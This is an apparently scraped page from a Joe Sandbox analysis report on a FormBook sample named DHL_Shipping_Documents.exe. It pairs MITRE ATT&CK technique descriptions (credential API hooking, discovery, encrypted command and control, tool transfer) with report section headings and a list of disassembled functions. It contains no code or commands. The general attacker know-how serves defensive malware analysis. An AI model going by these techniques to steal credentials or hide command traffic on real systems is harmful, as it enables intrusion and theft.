Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL_Shipping_Documents.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_Shipping_Documents.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Windows Analysis Report
DHL_Shipping_Documents.exe

Function 015ED3F9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Function 015ED408 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 05BE7B78 Relevance: 1.8, APIs: 1, Instructions: 250
memoryCOMMON

Function 05BE8115 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 05BE8120 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 015EAD68 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 015E44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 015E590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 05BE7E91 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Function 056275B0 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Function 056268CC Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Function 05BE7E98 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 05BE7F81 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 05BE7A9C Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 015ED649 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON